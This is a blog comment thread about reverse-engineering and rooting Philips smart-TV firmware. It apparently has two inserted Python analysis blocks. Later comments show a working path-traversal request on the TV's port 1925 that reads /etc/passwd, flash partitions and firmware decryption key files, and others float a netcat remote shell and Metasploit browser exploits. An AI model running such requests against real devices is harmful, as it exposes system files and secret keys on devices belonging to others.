140 Comments

  1. topsy.com
    topsy.com January 26, 2010 at 11:33 . Reply
  2. lbpb
    lbpb January 29, 2010 at 11:47 . Reply

    Hi,
    I’d like to root my TV too. I tried to look at the FW upgrade and as you wrote there are several parts with lots of repetition. So it is probably just obfuscated but not really encrypted or at least not all of it. My guess is that it is some kind of structure/archive just xored with some key, but then this archive contains compressed files, however just unobfuscating it might reveal useful info. Anyway I couldn’t get any further for now. Other notes: my 8664 has port 80 open, but not answering to any request I tried. Port 8080 seems closed. There is a guy claiming to have fw sources: http://www.avforums.com/forums/lcd-led-lcd-televisions/1119695-there-any-custom-firmware-philips-televisions-firmware-editor-maybe.html (will try to contact him).

  3. rooter
    rooter January 29, 2010 at 19:01 . Reply

    Hi,

    I had a look at the newer firmware for the current 8xxx series.

    First, I stripped off the header and the, I think, signature to obtain the encrypted part. Then, I looked at all 16 byte blocks, sorted and counted them. One block occurred very often, about 5000 times. Searching this block in the file revealed large areas with this block repeated in them. I found more than 100 separate areas distributed over the whole file.

    IMO this shows that the whole file is encrypted with the same 128 bit block algorithm. I think the encrypted repetitious block contains fill bytes, either all 0x00 or all 0xff.

    I think it’s definitely no XOR cipher. In that case I would assume that some of the 16 byte blocks before the repeated areas would show some bytes of the repeated block in their last bytes, since I would assume that some of the previous areas wouldn’t end at a 16 byte boundary and hence end with the fill byte. But that’s apparently nowhere the case.

    You should use your draca tool again, but only on the encrypted part. Maybe we get some information about the block cipher used that way. But I assume it’s not so easy to crack the key, even if I assume the cleartext to be known.

    Another way would be to either solder off the NAND flash and read it out, or use a JTAG interface to read the NAND flash through the CPU. Not easy either…

  4. lbpb
    lbpb January 29, 2010 at 20:29 . Reply

    I still think it’s just xor, for 2 reasons:
    1- it would be very stupid to use more advanced crypto and still encrypt every 128 bit block individually. Of course you could use more advanced block modes with xor too, but if you are just trying to lightly obfuscate, then it can make sense to just apply a simple xor;
    2- for some of the repeated blocks, there are also some nearby blocks that begin with the same bytes but end differently and some that end with the same bytes but begin differently. If it were a more advanced crypto, this would be very improbable.
    Of course this is not a guarantee…anyway my next step is: take every block that repeats several times, xor the whole file with it and see if with any of them I get anything more interesting. This won’t work very well if different parts of the file are “coded” with different xor keys. Will post results.
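The block-frequency and boundary checks that rooter and lbpb argue about in comments 3 and 4, as an added example (not their tooling). It counts repeated 16-byte ciphertext blocks, locates runs of the most frequent one, and tests rooter's point: if the image were XORed with a repeating 16-byte key, the block just before each run of encrypted fill would end with a suffix of the repeated block wherever a segment ends mid-block; with a real block cipher it would not. The input is constructed: a fake image with 0xFF fill between segments of odd length, obfuscated both ways. The "ECB" side uses a keyed MD5 as a stand-in for a block cipher (deterministic per block, like ECB, but not AES), which is enough to show the behaviour the analysis looks for.

```python
"""Block-frequency analysis of an encrypted image (added example; not rooter's
or lbpb's tooling). Counts repeated 16-byte blocks, finds runs of the most
frequent one, and checks whether the block before each run ends with a suffix
of it, which a repeating 16-byte XOR key leaks at unaligned segment ends and a
real block cipher does not.
"""
from collections import Counter
import hashlib
import random

BS = 16

def block_histogram(data: bytes, bs: int = BS) -> Counter:
    """Count every aligned bs-byte block."""
    return Counter(data[i:i + bs] for i in range(0, len(data) - len(data) % bs, bs))

def find_runs(data: bytes, block: bytes, bs: int = BS):
    """(offset, count) for each maximal run of consecutive copies of block."""
    runs, i, n = [], 0, len(data) // bs
    while i < n:
        if data[i * bs:(i + 1) * bs] != block:
            i += 1
            continue
        start = i
        while i < n and data[i * bs:(i + 1) * bs] == block:
            i += 1
        runs.append((start * bs, i - start))
    return runs

def boundary_leaks(data: bytes, block: bytes, bs: int = BS, min_suffix: int = 2) -> int:
    """Number of runs whose preceding block ends with >= min_suffix bytes of block.
    With data = plaintext XOR repeating key, a segment that ends mid-block with
    fill bytes makes that block's tail equal the tail of the encrypted fill block;
    with ECB/CBC the preceding block is unrelated, so chance matches are ~256**-2."""
    leaks = 0
    for off, _ in find_runs(data, block, bs):
        if off == 0:
            continue
        prev = data[off - bs:off]
        if any(prev[-j:] == block[-j:] for j in range(bs - 1, min_suffix - 1, -1)):
            leaks += 1
    return leaks

def analyze(data: bytes, bs: int = BS) -> dict:
    """Summary: most frequent block, its count and runs, leak count, heuristic verdict."""
    top, count = block_histogram(data, bs).most_common(1)[0]
    runs = find_runs(data, top, bs)
    leaks = boundary_leaks(data, top, bs)
    return {"top": top.hex(), "count": count, "runs": runs, "leaks": leaks,
            "verdict": "repeating-xor-like" if leaks else "block-cipher-like"}

def make_samples(seed: int = 1):
    """Constructed test image: content segments of odd length separated by 0xFF fill,
    obfuscated two ways. The 'ECB' side uses md5(key || block) as a keyed
    stand-in for a block cipher (deterministic per block, like ECB; not AES)."""
    rng = random.Random(seed)
    key = bytes(rng.randrange(256) for _ in range(BS))
    plain = bytearray()
    for content_len, fill_len in ((37, 80), (50, 64), (23, 96), (61, 53)):
        plain += bytes(rng.randrange(256) for _ in range(content_len)) + b"\xff" * fill_len
    plain = bytes(plain)                                    # 464 bytes = 29 blocks
    xored = bytes(b ^ key[i % BS] for i, b in enumerate(plain))
    ecb = b"".join(hashlib.md5(key + plain[i:i + BS]).digest() for i in range(0, len(plain), BS))
    return plain, key, xored, ecb
```

On a real image, run analyze() over the header-less part: a top block with many runs but zero boundary leaks is what rooter describes and argues against a repeating XOR; leaks at most run starts would support lbpb's reading instead.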

  5. michu
    michu January 30, 2010 at 00:01 . Reply

    The draca results do not differ if I run it against the header-less firmware file.

    I also assume the 160 bytes in the header is the signature of the firmware.

    There are similar patterns in each firmware, but never the SAME – so the key has to be different in each firmware (check http://www.neophob.com/serendipity/index.php?/archives/183-Firmware-Visualizer-fwimage.html).

    Perhaps the ASCII text in the header is part of the key? (something like Q591E-0.100.0.0_)?

  6. lbpb
    lbpb January 30, 2010 at 08:28 . Reply

    Well trying to xor with the patterns didn’t lead anywhere. Also the non aligned blocks are very few and might be caused by encrypting different sections of the file individually. Just of note is that one single 128 bit block is repeated 5000 times, spread throughout the whole file, while the second most frequent block appears just about 500 times and is much more localized.

  7. rooter
    rooter January 30, 2010 at 10:29 . Reply

    It’s presumably some kind of block cipher with a 128 bit key. As if the 128 bit key size isn’t enough of a challenge, deducing which encryption algorithm was used might be possible for a crypto expert, but not for me.

    The best bet might really be to somehow read out the NAND flash. Presuming that the partition content is not encrypted, we could read out the software and use a disassembler to learn how it works – there’s one for MIPS in the objdump GNU utility.

    Defective SSB’s anyone? Any current Philips TV with a firmware structure like this would be eligible.

  8. michu
    michu February 8, 2010 at 20:44 . Reply

    The firmware is encrypted with blowfish/AES/… as a simple xor does not decrypt the file. The key differs in each release…

  9. Tom
    Tom February 8, 2010 at 22:33 . Reply

    Regarding the binary garbage on the serial interface in the Jett mode: this looks like a bitrate/mode mismatch on the serial line. Try other speed settings. And don’t rely on the “console=ttyS1,38400n8″ statement. I’ve seen kernels which just ignored settings passed by the bootloader and used hardcoded values.

    Good luck! :-)

  10. lbpb
    lbpb February 9, 2010 at 08:57 . Reply

    Models with NetTV also have an internal Opera 9.5 browser, with javascript support but no flash/macromedia. It might be possible to use some opera exploit but I couldn’t find any for MIPS architecture…

  11. rooter
    rooter February 9, 2010 at 20:10 . Reply

    Hmm… that idea is not bad.

    Metasploit has some opera exploits, and a shell payload for MIPS linux. The busybox configuration from the open source publication pack suggests that there’s no shell, hence another payload would have to be developed – an exec of “busybox” for a list of the really available commands would be the first thing to do.

    Anyway, the first thing to verify is that the browser is really vulnerable for one of the known exploits.

  12. michu
    michu February 9, 2010 at 22:58 . Reply

    I used those unknown 160 bytes in the header to decrypt the firmware, I tried AES-128-ECB, IDEA-ECB, DES, BLOWFISH, I used the key as little endian or big endian – without success.


    #!/bin/bash
    # Slide a 16-byte window over the 160 unknown header bytes (saved in ./key)
    # and try each window as a raw AES-128-ECB key against the header-less
    # firmware (./nohde); dump 128 bytes at a fixed offset after each attempt.
    for i in {0..144}        # 160 - 16 = 144 is the last complete 16-byte window
    do
        echo "---------- $i"
        dd if=key of=key.tmp bs=1 count=16 skip=$i 2> /dev/null
        # -K passes the raw key bytes in hex; -kfile would treat the bytes as a
        # passphrase and derive a different key from it. -nopad avoids a spurious
        # "bad decrypt" on the last block when the key is wrong.
        openssl aes-128-ecb -d -nopad -K "$(xxd -p key.tmp)" -in nohde -out decr.xxx
        dd if=decr.xxx skip=28554720 bs=1 count=128 2> /dev/null | hexdump -Cv
    done

  13. lbpb
    lbpb February 12, 2010 at 09:06 . Reply

    Apparently my tv is not affected by the exploit I found on Metasploit (I just found 1 anyway, if you found more then I must have missed something).

  14. michu
    michu February 13, 2010 at 16:49 . Reply

    hmm why is the firmware file-size 28’750’876 (-732 bytes header) bytes while the flashed size is only 25’783’095 bytes (Totalsize flashed: 25783095, TotalProgramSize: 25783095)? What are the remaining 2’967’049 bytes?

  15. michu
    michu February 13, 2010 at 17:51 . Reply

    Ok those 160 bytes in the header are really a signature, I nulled out those 160 bytes and tried to flash it. The validation process fails:

    00 052.448 V: 93%
    00 052.989 V: 97%
    00 053.439 Invalid Firmware! Bad checksum or bad signature.

  16. michu
    michu February 18, 2010 at 21:15 . Reply

    I just found an interesting note in the service manual:

    The set software and security keys are stored in a NAND- Flash, which is connected to the PNX8541 via the PCI bus.

  17. rooter
    rooter February 19, 2010 at 08:35 . Reply

    That’s why I asked for defective PCB’s :-)

  18. michu
    michu February 22, 2010 at 01:17 . Reply

    Infos about “Option number” in the SAM Menu:

    The first line (group 1) indicates hardware options 1 to 4.
    The second line (group 2) indicates software options 5 to 8.

  19. alterpeople
    alterpeople March 13, 2010 at 17:07 . Reply

    fixing a q591e -la with mpeg4 hardware activated wrongly.
    Boot with jetfiles, connect the compair, select q52x,
    use the nvm editor and set address 0124 to the value 42

    ;-)

  20. alterpeople
    alterpeople March 13, 2010 at 18:47 . Reply

    the same value must be changed at the 10EF and 16E8 addresses.

    enjoy

    ;)

  21. Joao
    Joao April 15, 2010 at 09:56 . Reply

    I do not currently own a Philips Net TV but I’m considering buying one. Someone please correct me if I’m wrong but these TV models do not have Bluetooth support. From what I read so far, text input is cumbersome (not only on the Philips but on every other brand), so Bluetooth would be good in order to have a wireless keyboard. Playstation, for instance, supports a Bluetooth keyboard. Being able to change the firmware would have, at least, one interesting objective: adding Bluetooth support!

  22. michu
    michu April 15, 2010 at 11:27 . Reply

    hey joao

    You’re right, there is no bluetooth hardware installed, at least not on my model.

  23. Steve
    Steve May 29, 2010 at 10:16 . Reply

    That’s why I asked for defective PCB’s :-)

  24. Baris
    Baris June 1, 2010 at 16:23 . Reply

    I am trying to make an EIB cable but I am without luck.
    Does the serial port of the TV need to be activated somehow?

    I made a “stereo jack to serial” which I linked to a serial to USB dongle. I tried both 115200 and 38400 baud.

    Do I need to enable/disable software or hardware control in the terminal program?

  25. MartiniB
    MartiniB June 10, 2010 at 10:15 . Reply

    just an idea: the key (or an index to it) can be in the header

    i have compared two firmwares of the same version (Release for TV520 R2:Q591E-0.83.0.0 Generation date:29/09/2008 13:44:08)
    !!! the version is the same but the autorun.upg differs
    first 543 bytes are exactly the same
    544 to 703 ???????????
    704 to 728 plain text “Q591E-0.83.0.0_commercial”
    729 to 28648764 ???????????

  26. Terap
    Terap June 25, 2010 at 00:03 . Reply

    Some LG info,
    http://www.lg-hack.info/ is an LG LCD TV hacking website, with details on unpacking/repacking the EPK/PAK firmware files.

    openlgtv, http://mikko.korkalo.fi/openlgtv/ is a Linux distribution that replaces the LG official firmware.

  27. [...] Newphob.com: Someone also trying to hack his TV (a Philips PFL9703), who’s gotten further but hasn’t cracked it yet. [...]

  28. Mark Zocher
    Mark Zocher October 7, 2010 at 17:08 . Reply

    Wow, you’ve gotten way further with this project than I ever did! (see http://www.myrejectedprojects.com/2010/09/hacking-my-philips-tv/). Did you see the progress the SamyGo project has made on the Samsungs? (http://samygo.sourceforge.net)

  29. Bert
    Bert October 26, 2010 at 20:51 . Reply

    I’m also looking for connection to my Philips TV. The Help mentions BusyBox, which reminds me of the Xtreamer. The Xtreamer can be reached by putting some .php files on a USB device and “open” one of these (fakeshell.php). Files can be found at http://www.mavvy.net

  30. bla
    bla January 4, 2011 at 18:45 . Reply

    Found following in http://www.scribd.com/doc/23986104/Philips-Ch-q529-1e-Lb:

    ReadCehtvData ConfigVersion: [0.01] OK
    ReadCehtvData ProductID: [Q591E] OK
    ReadCehtvData OUI: [0000903E] OK
    ReadCehtvData HardwareModel: [0203] OK
    ReadCehtvData HardwareVersion: [0100] OK
    ConvertAscii2Bin started
    ConvertAscii2Bin done
    ConvertAscii2Bin started
    ConvertAscii2Bin done
    ReadCehtvData PublicKey: OK
    ReadCehtvData done, ConfigOK: TRUE

    —>

    ReadCehtvData PublicKey: OK means that it uses some asymmetric encryption or?

  31. bla
    bla January 5, 2011 at 11:02 . Reply

    160 Byte is 1280 bit. There is also RSA-1280. Is RSA used here?

  32. none
    none January 5, 2011 at 14:23 . Reply

    No firmware hack, but access to the tv via network allows remote control and streaming to the ‘TV’: http://sourceforge.net/apps/mediawiki/jointspace/index.php?title=Introduction

  33. rysmario
    rysmario January 8, 2011 at 08:56 . Reply

    the file seems to be compressed too.. referring to the Q5551_v1.140.27.0.upg upgrade log (81 MB update), the ‘iStoredSize’ values add up to 81190368 bytes whereas the image payload is only 74936429 bytes large.

    encryption must be a 128 bit block cipher – if i take the image apart according to the header details, it is padded to fit 16 byte blocks…

  34. bak
    bak January 12, 2011 at 17:00 . Reply

    may provide a clue on algorithms used (gzip, sha1) – at least on this 58″

    http://www.p4c.philips.com/files/5/58pfl9955h_12/58pfl9955h_12_osr_eng.txt

  35. bla
    bla January 18, 2011 at 16:11 . Reply

    Has anyone tried to write a Hello World program and execute it in Jett mode?

  36. bla
    bla January 18, 2011 at 16:31 . Reply

    Here is an EEPROM dump of a 42pf9631d:
    http://www.badcaps.net/forum/showthread.php?t=9751

  37. Mark
    Mark February 2, 2011 at 04:39 . Reply

    It seems that the only way to read the NVM is to remove it from the TV’s PCB. No manual edit mode? HyperTerminal on the service UART is able to show logs only; what about a way to enter as root, making read and write possible? Thanks for any answer.

  38. Joshua
    Joshua February 9, 2011 at 23:19 . Reply
  39. ScripTrix
    ScripTrix February 22, 2011 at 09:11 . Reply

    Have you taken a look at the HELPFILE UPG?
    It has no “Version Header”, only 00h.
    From 211h to 2DFh is crypt stuff/header or so? However the commercial string is present with a parameter ->
    xxxxx_commercial.FORCEUPGRADE

  40. ScripTrix
    ScripTrix February 23, 2011 at 08:55 . Reply

    e.g. for my TV 7605 -> http://www.p4c.philips.com/files/4/40pfl7605h_12/40pfl7605h_12_mus_deu.zip

    It’s a ~3 MB File including the Helpsystem manual

  41. gigirex
    gigirex July 18, 2011 at 15:32 . Reply

    Hi!
    Did you have the HsvAntennaDigSrvcTable file format?
    Thanks

  42. George
    George July 22, 2011 at 17:56 . Reply
  43. Ian
    Ian July 30, 2011 at 19:25 . Reply

    I’ve just realised that my Philips TV runs Linux. I was so excited. Then the disappointment of finding there is no way in yet. One huge hole in the GPL: yes you can download the source, yes you can modify it and compile it, no you can’t run it because you can’t sign it!

  44. Recep
    Recep October 3, 2011 at 23:24 . Reply

    Try binwalk. I used it to analyze Sony Bravia firmware.

  45. Detektei
    Detektei November 7, 2011 at 00:28 . Reply

    Is there a chance to upgrade the unsupported Firmware of 37PFL8404..?

  46. Anonymous
    Anonymous December 5, 2011 at 22:22 . Reply

    I don’t think you can decrypt the firmware very easily. This series of PowerPC processors has on-chip fuses which can’t be read back; an internal processor can use these data to decrypt data. Probably an AES key is stored there.

    Without the private AES key, much patience in brute force, rainbow tables or corrupt Philips employees you are at a dead end.

    At the company where I work we use this processor in a SetTopBox with no smartcard. The key programmed in the fuses is the identification of the box.

  47. corecoder
    corecoder December 16, 2011 at 17:39 . Reply

    A different vector than firmware: the NetTV series run Opera 10 and it’s possible to enter any URL. It supports JavaScript and the 2011 TVs support SWF. Any ideas if or how this can be exploited?

  48. bkgg
    bkgg January 8, 2012 at 12:09 . Reply

    Well, I’m no practitioner, but maybe 2 cents from me.

    Regarding the encryption:
    With my model, a xxpfl5xxx, if you want to record something (regardless of timeshift or normal) the TV wants to format a connected HDD. The manual states that you can’t use this HDD in this condition otherwise.
    This could either be because it’s formatted for Linux, or because it’s encrypted. In the latter case, maybe it’s made with the same method and key as the firmware, because it has to be decoded again, and why use a second key for this. That would add cost.

    Other possibility would be jointspace. Your article is now 2 years old, and it has probably more functions now than then.
    First, the webserver is now in use with xxPFL5xx6 to xxPFL9xx6 models. Via port 1925 you can use some GET and two POST methods. So no big deal for rooting I guess.
    But Jointspace has a lot of methods in use. With this you can program software which is executed on your PC but shown on your TV. So maybe, if there is a weakness in their drawing function it is possible to activate telnet through a buffer overflow or something like this.
    (For example there is software for just showing your monitor on TV via ethernet or for playing Doom, controlled by remote control http://jointspace.sourceforge.net/download.html )

  49. corecoder
    corecoder January 20, 2012 at 23:10 . Reply

    The HDD is not encrypted, just formatted as extfs. But the recordings are encrypted to only allow playback on the TV they were recorded on -> maybe this?

    There also is an exploit for the Allegro RomPager webserver: http://www.securiteam.com/exploits/5XP0M0UCUO.html
    But I’m no expert on how to use this.

  50. Anonymous
    Anonymous March 7, 2012 at 11:56 . Reply

    This is the public key from the TV used as cookie to identify a debug USB stick during bootup (from /proc/public_key).

    Maybe this is also used for the Firmware?

    MIME-Version: 1.0
    Content-Type: application/octet-stream; name=”public_key256.out”
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename=”public_key256.out”

    QYMOXtEEAtDq1L/2xwExIU6qcuV4njMeDz68CCwzpoFTlgrK6IfrefrAe1R/jfLJBAOCKN+tf8Vt
    D/9n9W1Z/GWJYEFEe7hT5H2U+hxMBOnhGGJ3Ggl2JtPccEhOdXWL3uCZ8bqjCSghP6qtAEfZzG1Z
    BH+aE/jnhHD5UO+4gvqEqWM4TrpgY9DM4zYhOCEnLsIa24zoygMmNTnLkEYTftmlqgqrhg01X87w
    77ptPRskrxnm71z4BCMDXedmzKaw/lIEvfIuDYlGqSUOmQCv3m4YW1gddqymMu/yNyKnC5zr5gvE
    0cExBC05MkyFaU9365LJBongz5Rr0WIFuU7GvwEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  51. Anonymous
    Anonymous March 7, 2012 at 12:02 . Reply

    I forgot – this is the key from the PFL 7xx6 series

  52. pippo
    pippo April 9, 2012 at 16:38 . Reply

    @55: where did you get that public key from?
    And what is the debug USB stick supposed to do?

  53. Anonymous
    Anonymous April 18, 2012 at 11:22 . Reply

    /proc/public_key is used to decrypt UPG. But it must be 256 bytes. This key is too big.

  54. Anonymous
    Anonymous April 30, 2012 at 12:34 . Reply

    The file has 512 bytes, yes, but if you look at the hex dump, only the first 256 bytes have useful “randomlike” values. The remaining bytes are 01 00 01 00 00 00 00 …

  55. Anonymous
    Anonymous May 3, 2012 at 06:45 . Reply

    01 00 01 00 00… is a well-known RSA public exponent, while the first half of the file is an RSA modulus.
    UPG is encrypted using AES-256. Decryption key and SHA-1 checksum are stored in an RSA encrypted block (0x220-0x2A0).
    To decrypt 128 bytes you will need a modulus of 128 bytes, not 256.
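Reading the /proc/public_key blob from comment 50 the way comments 53 to 55 discuss it, as an added example (not the commenters' code). It decodes the base64, takes the first 256 bytes as the RSA modulus and the bytes after it (01 00 01 00 …) as the public exponent, and reports the key size. Assumptions the page does not state: the modulus is little-endian like the exponent (that byte order gives a modulus with its top bit set, i.e. a proper 2048-bit key), and a signature block taken from a file is big-endian unless told otherwise. rsa_public_op() and pkcs1_v15_unwrap() are what one would run on a trailing signature block to see whether it opens to a PKCS#1 v1.5 padded digest under this key.

```python
"""Parse the posted /proc/public_key blob and provide the raw RSA verify
primitive (added example, not the commenters' code). Byte-order assumptions:
modulus little-endian (matches the exponent's 01 00 01 layout), signature
block big-endian by default; pass order="little" to try the other reading.
"""
import base64

# Base64 from comment 50 (PFL 7xx6 series according to comment 51), copied verbatim.
PUBLIC_KEY_B64 = """
QYMOXtEEAtDq1L/2xwExIU6qcuV4njMeDz68CCwzpoFTlgrK6IfrefrAe1R/jfLJBAOCKN+tf8Vt
D/9n9W1Z/GWJYEFEe7hT5H2U+hxMBOnhGGJ3Ggl2JtPccEhOdXWL3uCZ8bqjCSghP6qtAEfZzG1Z
BH+aE/jnhHD5UO+4gvqEqWM4TrpgY9DM4zYhOCEnLsIa24zoygMmNTnLkEYTftmlqgqrhg01X87w
77ptPRskrxnm71z4BCMDXedmzKaw/lIEvfIuDYlGqSUOmQCv3m4YW1gddqymMu/yNyKnC5zr5gvE
0cExBC05MkyFaU9365LJBongz5Rr0WIFuU7GvwEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
"""

def decode_blob(b64: str) -> bytes:
    """Decode base64 that may have lost its trailing '=' padding when copied."""
    s = "".join(b64.split()).rstrip("=")
    return base64.b64decode(s + "=" * (-len(s) % 4))

def split_key(blob: bytes, mod_len: int = 256, order: str = "little"):
    """(n, e): modulus in the first mod_len bytes, zero-padded exponent after it."""
    if len(blob) < mod_len + 1:
        raise ValueError("blob shorter than modulus plus exponent")
    n = int.from_bytes(blob[:mod_len], order)
    exp = blob[mod_len:].rstrip(b"\x00")
    return n, int.from_bytes(exp, "little") if exp else 0

def load_public_key() -> dict:
    """Decode the posted blob and describe the key it contains."""
    blob = decode_blob(PUBLIC_KEY_B64)
    n, e = split_key(blob)
    return {"file_size": len(blob), "n": n, "e": e, "bits": n.bit_length()}

def rsa_public_op(block: bytes, n: int, e: int, order: str = "big") -> bytes:
    """Raw RSA verify primitive: block^e mod n, returned as a modulus-length string."""
    k = (n.bit_length() + 7) // 8
    if len(block) != k:
        raise ValueError(f"need a {k}-byte block for this modulus, got {len(block)}")
    s = int.from_bytes(block, order)
    if s >= n:
        raise ValueError("block is not below the modulus: wrong byte order or wrong key")
    return pow(s, e, n).to_bytes(k, order)

def pkcs1_v15_unwrap(em: bytes):
    """Strip 00 01 FF..FF 00 (RSASSA-PKCS1-v1_5); return the payload, or None if malformed."""
    if len(em) < 11 or em[0] != 0x00 or em[1] != 0x01:
        return None
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= len(em) or em[i] != 0x00:
        return None
    return em[i + 1:]
```

The 512-byte file is therefore a 256-byte modulus followed by the exponent 65537 and zero fill, i.e. RSA-2048, which is why a 128-byte RSA block (as in comment 55) cannot belong to this key. To test a candidate signature, take the last modulus-length bytes of the file, run rsa_public_op() with each byte order, and see whether pkcs1_v15_unwrap() returns a digest-sized payload.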

  56. Panayotis
    Panayotis August 9, 2012 at 10:21 . Reply

    Any ideas how to unlock the dvb t/c for all countries or Greece at least. Thanks in advance

  57. Garfield
    Garfield December 20, 2012 at 09:37 . Reply

    I have a 47pfl9732 with an “ask for Firmware boot loop” issue, can someone share JETTFILES with me?
    Thanks in advance.

  58. Bert
    Bert December 20, 2012 at 16:03 . Reply

    Used SAM mode to change DVB-T settings on my PFL9703. Now the TV continuously re-boots. Can’t put the TV back into SAM to revert to standard options. Any suggestions on how to get around or stop the TV from re-booting? Thanks

  59. Thomas
    Thomas April 2, 2013 at 10:01 . Reply

    Is anyone still trying to hack the firmware? I downloaded this sources for another TV model: http://www.p4c.philips.com/files/4/40pfl5507k_12/40pfl5507k_12_osf_eng.zip
    In linux_kernel_v2.6.28.9/NXP_patches_512/ there is a file mtd_auth_squash_using_keyctrl_block.patch which includes a public key. It is the same key as posted above in the comments. So obviously the key is the same for all models. There is also some information about how to decrypt the MTD blocks. Some other files look also promising.

  60. bs
    bs April 5, 2013 at 01:21 . Reply

    Found a link to sources for your particular model: http://www.p4c.philips.com/cgi-bin/dcbint/files/5/52pfl9703_98/52pfl9703_98_osf_aen.zip

    Note that there are 3 sub-models of the pfl9703 listed there (http://www.p4c.philips.com/cgi-bin/dcbint/files/5)

    I’m interested in buying a 55pfl5507k in Germany and I hope for some firmware improvements / fixes to this otherwise fine TV.

  61. Luis
    Luis April 13, 2013 at 14:45 . Reply

    Hello, from what I have seen here this might be a newbie thing, but who knows, maybe you did not think of it.

    I came here looking for info since I’m about to acquire a Philips TV (or maybe LG, any advice on that?)

    The thing is, a while ago I tried to hack a STB from my ISP for watching its video network. The device had literally no info on the internet; after some googling I found how to “detect” a serial port which I was able to use via an Arduino working as a converter (USB->serial).

    In my case the device was VERY locked: pressing keys on the serial console caused some kind of debug output to be shown, no more no less, but after some googling I found that the boot process could be stopped in the bootloader by pressing Ctrl+C at power-on. Try that ;)
    After you are there try to get some help from the bootloader shell, which I do not recognize; obviously it’s not the Broadcom one.
    What I did finally was:
    1 – build a telnet daemon and edit an init script (it had the init script but no binaries)
    2 – use the chainload to build the utilities I needed and put them inside a big free partition used for the device settings

    I did not continue my work since it proved I did not have that much time for a simple torrent client which needed this kind of work.

    The thing is, inside this device I was able to track down the firmware upgrade process, the certificates for firmware decryption, the flash commands even had help XD
    The other thing is, I had the option for tftp boot which I was not able to use, since the bootloader checked a signature somewhere in the kernel mtd; this caused it to not be able to boot even from the extracted ROM kernel image.
    I also found a secondary kernel partition

  62. Another Bert
    Another Bert April 29, 2013 at 10:58 . Reply

    My 2 cents in finding root access:
    Maybe some useful info following these instructions:

    ENTER: 062596 “INFO” or if your remote has no info button press “OK”
    There’s loads to play with in here. The menu is very well laid out and informative. “Virgin mode” is the factory reset.
    DO NOT ADJUST anything on the “OPTION NUMBERS” menu, GROUP 1 OR GROUP 2 beasties be here.
    (From: http://www.digitalworldz.co.uk/247216-philips-television-secret-menu.html)

    Philips service manual:
    http://www.go-gddq.com/upload/2011-10/11102710303370.pdf

  63. genesis
    genesis August 17, 2013 at 21:35 . Reply

    due to special circumstances I do not have access to my tv at the moment so I cannot test anything right now, but I think the browser may be indeed a valuable attack vector. maybe it is possible to access the file system and gain some information by using special URIs like about:info or file:// Once I have access again I will dump the network traffic while the TV installs an app. maybe this will provide enough information to fake the installation server in my home LAN and let me install my own apps like a remote shell – or simpler – a shell script which uses the netcat provided with busybox to open a remote shell. take a look at the approach of this guy: http://haxit.blogspot.com.es/2013/08/hacking-transcend-wifi-sd-cards.html to get an idea of what I intend to do

  64. bobom
    bobom December 21, 2013 at 22:05 . Reply

    It seems that on my pfl5008 port open for jointspace can be used for something else …

    $ wget -q -O - http://192.168.1.14:1925///proc/cpuinfo
    Processor : ARMv7 Processor rev 0 (v7l)
    BogoMIPS : 1694.10
    Features : swp half thumb fastmult vfp edsp vfpv3 vfpv3d16
    CPU implementer : 0x41
    CPU architecture: 7
    CPU variant : 0x3
    CPU part : 0xc09
    CPU revision : 0

    Hardware : MT5880
    Revision : 0000
    Serial : 0000000000000000

    $ wget -q -O - http://192.168.1.14:1925///etc/passwd
    root:x:0:0:root:/basic:/bin/sh

    etc.

    ;)

  65. Luis D
    Luis D December 22, 2013 at 00:06 . Reply

    it also works on 42pfl7007g

  66. Vesly
    Vesly December 22, 2013 at 20:47 . Reply

    Hello, this is crazy interesting, but out of my skill.
    I have at home a Philips 32PFL343D/12 stuck in the UPGRADE MENU and I am unable to CANCEL it. The latest firmware from Philips did it.
    Can someone help me to CANCEL it and use the old FW?
    Thx a lot

  67. SuperVirus
    SuperVirus January 6, 2014 at 01:34 . Reply

    How about the mtd devices?

    wget http://192.168.1.14:1925///dev/mtd0ro
    or
    wget http://192.168.1.14:1925///dev/mtd0

    with mtd0…mtdXX

    they may give you a dump of the different flash (nand) partitions…

  68. brandy
    brandy January 6, 2014 at 11:36 . Reply

    After some days of hacking I have now been able to extract the contents of the Autorun.upg of my 42PFL4208K12.

    The file is encrypted using AES128 and probably signed using RSA4096. Luckily, the required keys can be downloaded directly from the TV using the jointspace port (see bobom’s post above):

    /3rd_ro/key/TPVision_MTK2K13PLF_EU_UPG_AES.key
    /3rd_ro/key/TPVision_MTK2K13PLF_EU_UPG_AES.iv
    /3rd_ro/key/TPVision_MTK2K13PLF_EU_UPG_PubKey.pem

    The actual file names might vary depending on the TV model but can be found in the file /basic/libmtkapp.so using the command

    strings libmtkapp.so | grep /key/

    Notes on AES decryption
    ———————–

    The data is encrypted without using block padding. If the payload length is not a multiple of the block length (16 bytes) then the ciphertext bytes of the incomplete last block must simply be XORed with the corresponding bytes of the AES key before writing them to the output.

    UPG file structure
    ==================

    +-------------------------------------------+
    | Plaintext UPG header (length 0x80)        |
    +-------------------------------------------+
    | AES128 encrypted UPG header (length 0x90) |
    +-------------------------------------------+
    | AES128 encrypted block (variable length)  |
    +-------------------------------------------+
    | AES128 encrypted block (variable length)  |
    +-------------------------------------------+
